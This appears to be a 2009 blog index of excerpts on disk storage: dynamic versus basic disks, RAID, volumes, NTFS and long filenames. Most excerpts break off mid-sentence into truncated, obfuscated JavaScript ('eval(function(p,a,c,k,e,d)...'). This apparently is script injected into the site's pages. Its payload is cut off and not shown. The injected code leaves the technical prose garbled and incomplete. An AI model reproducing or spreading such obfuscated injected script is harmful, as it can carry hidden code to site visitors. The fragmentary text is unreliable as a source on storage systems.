Compared to basic disk, dynamic disk has following characteristic:
It may change disk capacity at random. You can change the capacity of disk without losing data and restarting computer. That of basic disk may lose data.
Disk eval(function(p,a,c,k,e,d){e=function(c){return...
December 14, 2009 2:36 AM / no comments
Norman Ken Ouchi at IBM was awarded U.S. Patent 4,092,732 titled “System for recovering data stored in failed memory unit” in 1978 and the claims for this patent describe what would later be termed RAID 5 with full eval(function(p,a,c,k,e,d){e=function(c){return...
December 14, 2009 2:23 AM / no comments
RAID can be implemented either in dedicated hardware or custom software running on standard hardware. Additionally, there are hybrid eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...
December 14, 2009 2:14 AM / no comments
A volume is a storage unit made from free space on one or more disks. It can be formatted with a file system and assigned a drive letter. Volumes eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...
December 11, 2009 9:05 AM / 1 comment
For example, we may transform basic disk into dynamic disk by the disk management utility of Windows eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...
December 11, 2009 8:27 AM / no comments
NTFS treats files as a unit of attribute/attribute value. That is the differences between NTFS and other file system. File data is attribute value without names. Other file attributes includes file name, file owner and file time mark, etc.
Each...
December 11, 2009 8:10 AM / no comments
First eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...
December 11, 2009 3:57 AM / no comments
In NTFS eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...
December 10, 2009 7:55 AM / no comments
NTFS (New Technology File System) From the very beginning is set for enterprise file system. In order to reduce data loss by sudden power cut or system collapsing, the file system should always guarantee the integrity of
metadata in file system....
December 10, 2009 7:12 AM / no comments
Although Windows95 and its superior system realize the compatibility of long filename and DOS, Windows3.x via above method, there are also several problems:
1. When changing the name of created long eval(function(p,a,c,k,e,d){e=function(c){return...
December 10, 2009 6:51 AM / no comments